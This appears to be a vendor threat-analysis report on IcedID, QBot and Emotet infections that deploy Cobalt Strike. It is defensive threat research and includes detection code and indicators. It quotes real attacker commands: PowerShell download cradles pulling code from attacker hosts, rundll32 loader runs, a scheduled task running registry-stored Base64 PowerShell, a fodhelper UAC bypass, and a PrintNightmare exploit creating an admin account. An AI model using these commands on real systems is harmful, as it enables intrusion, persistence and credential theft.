The Cybereason Global Security Operations Center (GSOC) Team issues Cybereason Threat Analysis reports to inform on threats with significant impact. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
In this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving malicious actors used the malware loaders IcedID, QBot, and Emotet to deploy the Cobalt Strike framework on the compromised systems.
The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s high damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group.
Cobalt Strike is an adversary simulation framework with the primary use case of assisting red team operations. However, Cobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a modular framework with an extensive set of features that are useful to malicious actors, such as command execution, process injection, and credential theft.
The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once Cobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to other threat actors, including ransomware group affiliates.
In the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack scenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems (i.e. malware loaders) to deploy Cobalt Strike on the systems.
In this article, we present the activities of the malware loaders and the malicious actors that operated the loaders in three selected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the deployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group.
Malicious actors use the IcedID malware to distribute various types of malware, including ransomware, to compromised systems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in phishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as reconnaissance activities and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt Strike on compromised systems.
QBot, also known as Qakbot, is malware that has been present on the threat landscape since 2007. QBot originally featured information-stealing and trojan functionality; however, the malicious actors that develop QBot have since extended it with malware-loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious attachments in phishing emails. QBot downloads and executes additional malware on compromised machines, such as the Cobalt Strike framework and ransomware, including REvil and ProLock.
Since security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking Trojan into a malware loader. Over the last few years, until authorities disrupted the infrastructure of the Emotet operators as part of a global operation in the first quarter of 2021, malicious actors had been using Emotet to deliver the Ryuk ransomware to compromised systems.
On November 15, 2021, security researchers announced the discovery of a new Emotet variant on the threat landscape. Shortly thereafter, the Cybereason GSOC team observed attack scenarios in which the new Emotet variant deployed Cobalt Strike on compromised systems.
The figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this scenario, the malicious actors, whom we attribute to affiliates of the Conti ransomware group, specifically targeted a user by sending the user an email with an attachment (an Excel document) that was almost identical to a legitimate email and attachment already distributed to other users within the organization.
The difference was that the attached Excel document contained a malicious macro. This indicates a potential long-term presence of the actors in the environment:
When the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an attacker-controlled endpoint and then executed the file. The macro downloaded the IcedID executable to the home directory of the user, such as C:\Users\test\javabridge64.exe, where javabridge64.exe is the name of the IcedID executable and C:\Users\test is the home directory of the user test:
Approximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the SysInfo IcedID command to enumerate relevant system information, such as active processes, and to conduct the following reconnaissance activities:
Approximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the ExecAdmin IcedID command, which attempts to elevate privileges through a known Windows User Account Control (UAC) bypass that abuses the fodhelper Windows utility. fodhelper.exe auto-elevates without a UAC prompt and honors the HKCU\Software\Classes\ms-settings\Shell\Open\command registry key, so an attacker who writes a command to that key (together with an empty DelegateExecute value) and then launches fodhelper.exe gets the command executed at high integrity. The presence of that key under a user hive is the artifact defenders should hunt for.
After approximately 5 minutes, the malicious actors executed the Exec IcedID command to execute code by injecting it into a cmd.exe instance. Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the command rundll32 adobe.dll,kasim (where adobe.dll is the loader DLL and kasim is the exported entry point that rundll32 calls):
A few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the attacker-controlled endpoint with an IP address of 185.70.184[.]8 by executing the PowerShell command:
IEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a')).
On this basis we attribute the actors to Conti affiliates: the Conti group operated the endpoint with the IP address 185.70.184[.]8 in the week when the attack we discuss took place. In addition, the security community has observed Conti affiliates using the IcedID malware to deploy Cobalt Strike on compromised systems.
To deploy the IcedID malware, the Conti affiliates targeted a particular user. At a larger scale, in the middle of 2021, we observed malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign, which we discuss in the following section.
This “stolen images evidence” campaign involved phishing emails generated by the contact forms of legitimate organizations and sent to the targeted users, the contact form recipients. The emails contained legal threats related to copyright infringement over copyright-protected images that the targeted user had supposedly stolen. The emails urged the recipient to sign into a Google page that purportedly listed the images. After the user signed into the page with valid Google credentials, the page downloaded a malicious JavaScript (.js) file, which was then executed through the Windows wscript utility.
The script executed a Base64-encoded PowerShell command that downloaded and executed the IcedID malware; decoded, the command read, for example:
IEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php').
The execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry point, such as:
rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer.
This DLL conducted the first stage of deployment of the IcedID malware and we refer to it as first-stage IcedID DLL:
The first-stage DLL gathered information about the compromised machine, such as hardware and operating system information, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was encrypted using a symmetric encryption key.
The first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that typically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s %LocalAppData% directory, such as:
C:\Users\user\AppData\Local\Temp\rebuildx32.tmp, and the license.dat file in the user’s %AppData% directory.
The first-stage IcedID DLL then executed the DLL file, which we refer to as the second-stage IcedID DLL, such as:
rundll32.exe "C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update /i:"ApproveFinish\license.dat".
The main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. license.dat contained encrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat and executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe:
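The IcedID chains described above, from the Conti scenario (rundll32 adobe.dll,kasim followed by the IEX download cradle) to the "stolen images evidence" sequence of wscript, PowerShell cradle and two rundll32 stages, leave a consistent trail in process-creation telemetry. The following Python is an added example written for this article, not Cybereason's detection logic: it classifies a handful of process events constructed here to mirror the command lines quoted above. The event field names are an assumption about whatever EDR or Sysmon data is available, and the defanged "[.]" is kept as printed (live telemetry carries the real host).

```python
"""Flag the process-creation patterns of the two IcedID chains described above.

Added example, not Cybereason's code. It runs over a few process events
constructed here to mirror the command lines quoted on this page (defanged
'[.]' kept as printed). The event field names are an assumption about
whatever EDR or Sysmon telemetry you actually have.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image name, lower-case
    image: str    # image name, lower-case
    cmdline: str  # full command line as logged


# Directories an unprivileged user can write to; the loaders on this page
# run their DLLs from one of them via rundll32 or regsvr32.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\ProgramData\\|\\Temp\\",
    re.IGNORECASE,
)

# PowerShell download cradle: IEX fed by Net.WebClient.DownloadString, the
# shape of both cradles quoted on this page.
CRADLE = re.compile(
    r"(?:IEX|Invoke-Expression)\b.*?\bNet\.WebClient\b.*?\bDownloadString\s*\(\s*['\"]"
    r"(?P<url>[^'\"]+)",
    re.IGNORECASE | re.DOTALL,
)

# rundll32 <dll>,<export> [args]; the DLL may be quoted and need not end in .dll
RUNDLL32 = re.compile(
    r"rundll32(?:\.exe)?\s+\"?(?P<dll>[^\",]+?)\"?\s*,\s*(?P<export>\S+)(?P<rest>.*)",
    re.IGNORECASE,
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def analyze(ev: ProcEvent) -> list[str]:
    """Return one finding string per suspicious trait; an empty list means clean."""
    findings = []
    if ev.image == "powershell.exe":
        m = CRADLE.search(ev.cmdline)
        if m:
            findings.append(f"download cradle -> {m.group('url')}")
        if ev.parent in SCRIPT_HOSTS:
            findings.append(f"powershell spawned by script host {ev.parent}")
    elif ev.image == "rundll32.exe":
        m = RUNDLL32.search(ev.cmdline)
        if m:
            dll, export, rest = m.group("dll"), m.group("export"), m.group("rest")
            if USER_WRITABLE.search(dll):
                findings.append(f"DLL {dll} loaded from a user-writable path ({export})")
            if not dll.lower().endswith(".dll"):
                findings.append(f"non-.dll file {dll} passed to rundll32")
            if "\\" not in dll:
                findings.append(f"bare DLL name {dll}, resolved from the working directory")
            if re.search(r"/i:", rest, re.IGNORECASE):
                findings.append("export given a /i: data file (second-stage IcedID shape)")
    return findings


# Constructed events, in the order the page describes the chains.
SAMPLE_EVENTS = [
    # "stolen images evidence" chain: .js under wscript -> PowerShell cradle
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe IEX(New-Object Net.WebClient).downloadString("
              "'http://minerdone[.]top/222g100/index.php')"),
    # first-stage IcedID DLL
    ProcEvent("powershell.exe", "rundll32.exe",
              r"rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer"),
    # second-stage IcedID DLL with its license.dat
    ProcEvent("rundll32.exe", "rundll32.exe",
              r'rundll32.exe "C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update '
              r'/i:"ApproveFinish\license.dat"'),
    # Conti scenario: Cobalt Strike loader and the follow-on cradle
    ProcEvent("cmd.exe", "rundll32.exe", "rundll32 adobe.dll,kasim"),
    ProcEvent("cmd.exe", "powershell.exe",
              "powershell IEX ((new-object net.webclient).downloadstring("
              "'http://185.70.184[.]8:80/a'))"),
    # benign control: a Control Panel applet launched from System32
    ProcEvent("explorer.exe", "rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"),
]


def run_sample() -> list[list[str]]:
    """Findings per constructed event, in order."""
    return [analyze(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, run_sample()):
        print(f"{ev.parent} -> {ev.image}: {hits or 'clean'}")
```

The checks are deliberately coarse: a signed Microsoft DLL loaded from System32 with Control_RunDLL stays clean, while a .dat or .tmp file under the user's profile passed to rundll32, a bare DLL name with no path, or a cradle under a script host each produce a finding that an analyst can pivot on.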
The figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike:
Malicious actors distribute QBot as attachments to phishing emails, typically Microsoft Office Excel documents. When the user opens the document, Excel prompts the user to enable macro execution. Once enabled, the malicious macro first downloads the QBot malware from an attacker-controlled endpoint and then executes it.
In the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the %ProgramData% directory (C:\ProgramData) under a filename with the .ocx extension, such as Volet1.ocx (other observed names include Volet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL that the macro executed using the regsvr32 Windows utility. This DLL unpacked and loaded a second DLL, stager_1.dll, that implements the main QBot functionality.
In addition, the DLL injected stager_1.dll into a legitimate Windows process - msra.exe:
Approximately 6 minutes after injecting stager_1.dll into msra.exe, QBot conducted reconnaissance by executing the net, arp, ipconfig, netstat, nslookup, route, and whoami commands. The figure below depicts the execution of these commands, including their command-line parameters:
Approximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised system by executing the following command:
schtasks.exe /Create /F /TN "{A08F7C8F-D95F-4395-8732-9818E00F3DB2}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Cvdijvkees).omowidpdnpcwb))) " /SC MINUTE /MO 30
This command creates a scheduled task named {A08F7C8F-D95F-4395-8732-9818E00F3DB2} that runs every 30 minutes and executes Base64-encoded PowerShell code stored in the omowidpdnpcwb value of the registry key HKEY_CURRENT_USER\SOFTWARE\Cvdijvkees.
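The scheduled task above is worth pulling apart mechanically, because the same shape (GUID-named task, start /min, PowerShell that IEXes a Base64 blob read from a random HKCU key) recurs across QBot infections and is easy to triage from a process-creation log. The following Python is an added example, not Cybereason's code: it parses the schtasks command line quoted on this page and reproduces the decode step the task's PowerShell performs. The page does not reproduce the registry value content, so the payload decoded here is a constructed placeholder.

```python
"""Pull the persistence details out of the QBot schtasks command quoted above
and reproduce the decode step the task's PowerShell performs.

Added example, not Cybereason's code. The scheduled-task command line is the
one shown on this page; the registry value content is constructed here (the
page does not reproduce it), so the decoded text is a placeholder.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class TaskPersistence:
    task_name: str
    schedule: str               # /SC value, e.g. MINUTE
    modifier: int               # /MO value, e.g. 30 -> every 30 minutes
    action: str                 # /TR value, the command the task runs
    reg_path: Optional[str]     # registry key the payload is read from
    reg_value: Optional[str]    # value name holding the Base64 payload
    flags: list[str]


# The command line as quoted on this page.
SCHTASKS_CMD = (
    r'schtasks.exe /Create /F /TN "{A08F7C8F-D95F-4395-8732-9818E00F3DB2}" '
    r'/TR "cmd /c start /min \"\" powershell.exe -Command '
    r'IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('
    r'(Get-ItemProperty -Path HKCU:\SOFTWARE\Cvdijvkees).omowidpdnpcwb))) " '
    r'/SC MINUTE /MO 30'
)

GUID_NAME = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.IGNORECASE)
REG_READ = re.compile(
    r"Get-ItemProperty\s+-Path\s+(?P<path>[^\s)]+)\)\.(?P<value>\w+)", re.IGNORECASE
)


def parse_schtasks(cmdline: str) -> TaskPersistence:
    """Extract task name, schedule and action, and flag what makes the task suspicious."""
    name = re.search(r'/TN\s+"([^"]+)"', cmdline).group(1)
    # /TR is double-quoted and itself contains \" escapes, so stop at the quote
    # that is followed by the next switch rather than at the first quote seen.
    action = re.search(r'/TR\s+"(.*?)"\s+/(?:SC|ST|SD|RL|RU)\b', cmdline,
                       re.DOTALL).group(1).strip()
    schedule = re.search(r"/SC\s+(\w+)", cmdline, re.IGNORECASE).group(1).upper()
    mo = re.search(r"/MO\s+(\d+)", cmdline, re.IGNORECASE)
    modifier = int(mo.group(1)) if mo else 1

    reg = REG_READ.search(action)
    flags = []
    if GUID_NAME.match(name):
        flags.append("task name is a bare GUID, imitating system tasks")
    if re.search(r"powershell(\.exe)?\s", action, re.IGNORECASE) and \
            re.search(r"\bIEX\b|Invoke-Expression", action, re.IGNORECASE):
        flags.append("action runs PowerShell that IEXes generated code")
    if "FromBase64String" in action and reg:
        flags.append(f"payload is Base64 in registry {reg.group('path')}\\{reg.group('value')}")
    if "start /min" in action.lower():
        flags.append("window hidden with start /min")
    return TaskPersistence(name, schedule, modifier, action,
                           reg.group("path") if reg else None,
                           reg.group("value") if reg else None, flags)


def decode_stored_payload(value_data: str) -> str:
    """Same transform as [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(x))."""
    return base64.b64decode(value_data).decode("ascii")


# Constructed stand-in for the data QBot wrote to HKCU\SOFTWARE\Cvdijvkees\omowidpdnpcwb.
CONSTRUCTED_REG_VALUE = base64.b64encode(b"Write-Output 'placeholder next stage'").decode()


if __name__ == "__main__":
    t = parse_schtasks(SCHTASKS_CMD)
    print(f"{t.task_name} every {t.modifier} {t.schedule.lower()}(s)")
    print("reads", t.reg_path, t.reg_value, "->", t.flags)
    print("decoded payload:", decode_stored_payload(CONSTRUCTED_REG_VALUE))
```

On a live host the same decode can be applied to the actual value (for example the output of reg query on the key the parser extracted) to recover the next-stage PowerShell without running it.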
Approximately 48 minutes after creating the scheduled task, QBot injected Rubeus, a tool for attacking Kerberos deployments, into the legitimate Windows Update client process wuauclt.exe. After approximately 18 minutes, QBot stole web browser data, such as cookies and browsing history, using the recovery functionality of the esentutl Windows utility.
After approximately 2 minutes, QBot attempted to exploit the PrintNightmare vulnerability (CVE-2021-34527) by executing Invoke-Nightmare, a publicly available PowerShell exploit for the flaw, to create an administrative user with the username admin1 and the password Password.
After approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attacker-controlled endpoints known to be associated with Cobalt Strike at the time the attack took place:
The figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike:
Malicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails. In addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files that store Office documents, and Universal Windows Application installation packages that download and execute Emotet when a user executes the installation package:
If an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the document to enable Office macro execution:
When the user enables macro execution, the malicious Office macro embedded in the Word document runs. The macro first deobfuscates its own code by removing junk character sequences, such as Cew (see the figure below), and then executes the deobfuscated code:
The de-obfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the %ProgramData% directory, such as C:\ProgramData.
Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores under a random filename in the %ProgramData% directory. The PowerShell code then uses the rundll32 Windows utility to execute Emotet:
Instead of executing the PowerShell code directly, the de-obfuscated macro code may first create a Windows Batch (.bat) file in the %ProgramData% directory under a random name, such as C:\ProgramData\sdfhiuwu.bat or yksds.bat, and then execute that file. The .bat file stores obfuscated code that includes Base64-encoded code and code split across multiple string variables.
The obfuscated code in the .bat file executes the PowerShell code that downloads and then uses the rundll32 Windows utility to execute Emotet:
The PowerShell code uses the rundll32 Windows utility and specifies the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the internal name of X.dll:
If an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document to enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office macros that distribute Emotet.
When the user enables macro execution, the Office macros execute:
The macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the extension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx.
The macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (&) character to individual characters of the name:
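Both obfuscation tricks described above, the junk character sequences the Word macros splice into their code (Cew) and the ampersand splitting of the DLL entry-point name in the Excel macros, exist to keep string matches on Control_RunDLL or DllRegisterServer from firing on the macro source. The following Python is an added example, not Cybereason's code: it normalizes macro strings extracted with a tool such as olevba and recovers the rundll32 DLL path and entry point. The junk token and the .ocx names come from this page; the page does not reproduce the obfuscated macro lines themselves, so the samples below are constructed to match its description, and handling of the "Dll"&"Register"&"Server" quoted-piece form is an assumption about a variant the page does not show.

```python
"""Recover the real rundll32 entry point from Emotet macro strings obfuscated in
the two ways described above: junk character sequences spliced into strings
(Word macros) and '&' splitting the export name into pieces (Excel macros).

Added example, not Cybereason's code. The junk token 'Cew' and the .ocx names
come from the page; the obfuscated lines below are constructed to match its
description, and the quoted-piece ("Dll"&"Register") form is an assumption.
"""
from __future__ import annotations

import re
from typing import Optional

# Entry points the page reports Emotet's launchers using.
KNOWN_ENTRY_POINTS = {"control_rundll", "dllregisterserver"}

RUNDLL32_CALL = re.compile(
    r"rundll32(?:\.exe)?\s+(?P<dll>[^,\"]+),(?P<export>[^\s\")]+)", re.IGNORECASE
)


def strip_junk_token(text: str, token: str = "Cew") -> str:
    """Undo the Word-macro trick: remove every occurrence of the junk sequence."""
    return text.replace(token, "")


def join_concatenation(text: str) -> str:
    """Undo "Dll"&"Register"&"Server"-style splitting inside a macro string."""
    return re.sub(r'"\s*&\s*"', "", text)


def normalize_export(export: str) -> str:
    """Undo C&o&n&t&r&o&l-style splitting of a bare export name."""
    return export.replace("&", "")


def recover_launcher(macro_line: str, junk: str = "Cew") -> Optional[dict]:
    """Return the DLL path, the cleaned export and whether it is a known Emotet
    entry point, or None if the line does not launch rundll32."""
    cleaned = join_concatenation(strip_junk_token(macro_line, junk))
    m = RUNDLL32_CALL.search(cleaned)
    if not m:
        return None
    export = normalize_export(m.group("export"))
    return {
        "dll": m.group("dll").strip(),
        "export": export,
        "known_entry_point": export.lower() in KNOWN_ENTRY_POINTS,
    }


# Constructed samples modelled on the page's description.
SAMPLES = [
    # Excel: export split character by character with '&'
    r'=EXEC("C:\Windows\System32\rundll32.exe C:\ProgramData\besta.ocx,C&o&n&t&r&o&l&_&R&u&n&D&L&L")',
    # Excel: export split into quoted pieces (assumed variant)
    r'=EXEC("rundll32 C:\ProgramData\bestb.ocx,Dll"&"Register"&"Server")',
    # Word: junk token spliced into the launcher string
    r'Shell "ruCewndll32 C:\ProgramData\sdfhiuwu.dll,DllRegCewisterServer"',
    # rundll32 with an export outside the set the page reports
    r'rundll32 C:\ProgramData\bestc.ocx,StartW',
    # unrelated macro line
    r'Set x = CreateObject("Scripting.FileSystemObject")',
]


def run_samples() -> list:
    """recover_launcher() result per constructed sample, in order."""
    return [recover_launcher(s) for s in SAMPLES]


if __name__ == "__main__":
    for line, result in zip(SAMPLES, run_samples()):
        print(result, "<-", line)
```

Normalizing before matching is the point: a rule that looks for rundll32 plus Control_RunDLL or DllRegisterServer in raw macro text misses every one of the first three samples, while the same rule applied to the normalized export catches them and still distinguishes an unexpected export such as StartW.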
When Emotet executes on a compromised system, the malware first establishes persistence by creating system services that start at system startup or by creating registry values at the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key:
Emotet then executes processes that conduct malicious activities. The processes that Emotet executes have random names and are child processes of the rundll32 process that runs Emotet.
In the attack scenario that we analyzed, Emotet executed a process that steals cookies and web or email credentials from client credential stores. Emotet launched WebBrowserPassView, a NirSoft password-recovery tool that extracts saved credentials from browser credential stores, with the scomma switch on the process command line, which makes the tool write its output as a comma-separated file. Emotet then exfiltrated data from the compromised system to attacker-controlled endpoints:
After Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system. Emotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the DllRegisterServer DLL entry point.
The Cybereason XDR Platform is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection that detects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities:
The Cybereason GSOC recommends the following:
Cybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to everywhere. Schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.
Executables (SHA-1 hashes):
a4d415c07b4ff77c6bd792c32fc46bfc6a1b0354
e8992a283f9f37dec617b305db2790d9112d3a20
Domains:
zasewalli[.]fun
endofyour[.]ink
pedrosimanez[.]fun
kingflipp[.]online
beliale232634[.]at
belialw869367[.]at
belialq449663[.]at
IP Addresses:
23.111.114[.]52
104.168.44[.]130
185.70.184[.]8
MITRE ATT&CK tactics observed: Initial Access, Execution, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement, Exfiltration.
Techniques called out: Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002); Remote Services: Remote Desktop Protocol (T1021.001).
Eli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber security industry since 2017. In his free time, he publishes articles about malware research and threat hunting.
Aleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research activities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for Science, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion detection and reverse engineering security mechanisms of the Windows operating system.
Brian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages security incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the current threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information & Cyber.
Yonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware analysis, digital forensics, and incident response.
Rotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis activities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious operations prevalent in the current threat landscape. Rotem has been working in the cybersecurity industry since 2018.